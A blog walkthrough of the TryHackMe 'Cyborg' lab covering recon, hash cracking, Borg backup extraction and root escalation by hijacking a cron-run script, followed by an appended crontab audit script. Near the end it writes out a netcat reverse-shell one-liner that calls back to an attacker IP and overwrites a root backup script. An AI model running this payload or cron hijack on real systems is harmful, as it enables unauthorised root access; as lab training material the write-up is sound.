Tryhackme: Cyborg — WalkThrough - CyberSec Nerds

Today, we will be doing an easy box from TryHackMe called Cyborg which is labeled as a beginner-level room that aims at teaching basic web recon, hash cracking, backup decryption, and exploiting misconfigured cron jobs. Without further ado, let’s connect to our THM OpenVPN network and start hacking!!!

Reconnaissance

Let's spin up nmap and start scanning the machine for open ports.

From the above results, we can clearly see that only two ports are open: port 22 (SSH) and port 80 (HTTP). Let's navigate to the web page hosted by the machine. It is just the default Apache "It works" page.

After scanning for hidden directories with the dirsearch tool, we find two interesting directories: /admin and /etc. Let's check them out.

Directory scanning using dirsearch.py

Inside the admin directory there is a small personal blog of a music artist running on this machine. Looking around, we find a toggle that offers an archive for download. This lets us download an archive.tar file. We will save this for later.

Going over to the Admins section, we can see there is a shout box where people can message each other. They talk about a music archive, but the most important part is the discussion of the Squid proxy.

Squid is essentially just an HTTP proxy, but we don't need to look into it too deeply. The messages claim there are some config files lying about, so let's get googling and find out where they are normally located.

We find that the configuration lives at /etc/squid/squid.conf, and dirsearch picked up an /etc directory on the web server as well, so let's check that out.

/etc/squid folder

Inside the /etc/squid folder, two files are present:

  • squid.conf – Configuration file for the Squid proxy. Near the top, it refers to a password file.
  • passwd – Contains an account name along with its password hash.
/etc/squid/squid.conf
/etc/squid/passwd

Cracking the hash

https://hashcat.net/wiki/doku.php?id=example_hashes is an excellent place to find all the hash types hashcat supports, each with an example. Let's search for the given hash type: $apr1$. This is the Apache APR1 MD5 format, and its corresponding hashcat mode is 1600.

We will use hashcat with the "rockyou.txt" wordlist to crack the hash.

Voila! We have our credentials.
music_archive: [redacted]

Now it's time to look into the tar archive we downloaded. Let's untar the file; the listing is shown below.

After peeking at the README file, I learned that this is a Borg Backup repository, which I had never heard of before. Let's jump into the documentation at https://borgbackup.readthedocs.io/ and find out what borg really is.

It turns out to be backup software with built-in compression. In the Usage topic of the docs there is a section on extracting files, using the following command.

borg extract --list /path/to/repo::my-files

We can get the path to the repo by running pwd.

As for the my-files part (the archive name), this seems to be the music_archive that was mentioned earlier and that also appears as the username in the passwd file. When prompted for the repository passphrase, we use the password we just cracked.

The extraction took only a couple of seconds to complete. Inside the Documents folder there is a note.txt file which contains the SSH login credentials for the user alex.

SSHing into the machine

The user flag was immediately found after the login, inside the home directory.

Privilege Escalation

It's now time to own the system. Let's search for files owned by root with the SUID bit set.

The results, however, don't contain anything useful. Let's check the sudo privileges of the user "alex". A script was found that can be run with superuser privileges; its job is to back up all the music (*.mp3) files present on the system.

If you ran linpeas.sh, you would also see that the script is run by a cron job every minute. So now let's abuse this script by adding malicious reverse shell code which will bring the machine's root shell to our attacking machine.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.147.137 9001 >/tmp/f' > /etc/mp3backups/backup.sh

We will be listening with a netcat listener at port 9001.

Thanks to the cron job, it took about a minute for the script to send the reverse shell back to my machine. Wow! This is a root shell.

Listing the files, we find the root flag we have been looking for.

Yipee! We have owned the system. Happy Hacking!!!
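The root shell above came from a root cron job running a script that a normal user could edit. As an added example (not part of the original walkthrough), here is a small audit that flags cron jobs whose script is writable by someone other than the trusted owner; it assumes GNU coreutils (stat -c) and an /etc/crontab-style file with a user field.

```shell
#!/bin/sh
# Added example, not from the original post: audit an /etc/crontab-style file for
# jobs whose script is writable by someone other than the trusted owner (root by
# default). Assumes GNU coreutils (stat -c) and script paths without spaces.

# script_is_safe FILE [OWNER]: returns 0 if FILE exists, is owned by OWNER and has
# no group/other write bit; otherwise prints a finding and returns 1.
script_is_safe() {
    f="$1"; owner="${2:-root}"
    [ -e "$f" ] || { echo "MISSING  $f"; return 1; }
    perm=$(stat -c '%A' "$f")        # symbolic mode, e.g. -rwxrwxrwx
    fowner=$(stat -c '%U' "$f")
    if [ "$fowner" != "$owner" ]; then
        echo "OWNER    $f is owned by $fowner, expected $owner"; return 1
    fi
    case "$perm" in
        ?????w*|????????w*)          # char 6 = group write, char 9 = other write
            echo "WRITABLE $f ($perm $fowner)"; return 1 ;;
    esac
    return 0
}

# audit_crontab FILE [OWNER]: checks every job in FILE and returns the number of
# unsafe jobs (0 means clean). Handles "m h dom mon dow user cmd" lines and
# "@reboot user cmd" lines; comments, blank lines and VAR=value lines are skipped.
audit_crontab() {
    crontab="$1"; owner="${2:-root}"; findings=0
    scripts=$(awk '
        /^[[:space:]]*#/ || NF == 0            { next }   # comment or blank
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # SHELL=, PATH=, MAILTO=
        $1 ~ /^@/ && NF >= 3                   { print $3; next }
        NF >= 7                                { print $7 }
    ' "$crontab")
    for script in $scripts; do
        script_is_safe "$script" "$owner" || findings=$((findings + 1))
    done
    return $findings
}

# On a real host: audit_crontab /etc/crontab, then repeat for each file in /etc/cron.d/.
```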

Kiran Dawadi

Founder of cybersecnerds.com. Electronics Engineer by profession, Security Practitioner by passion. I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.
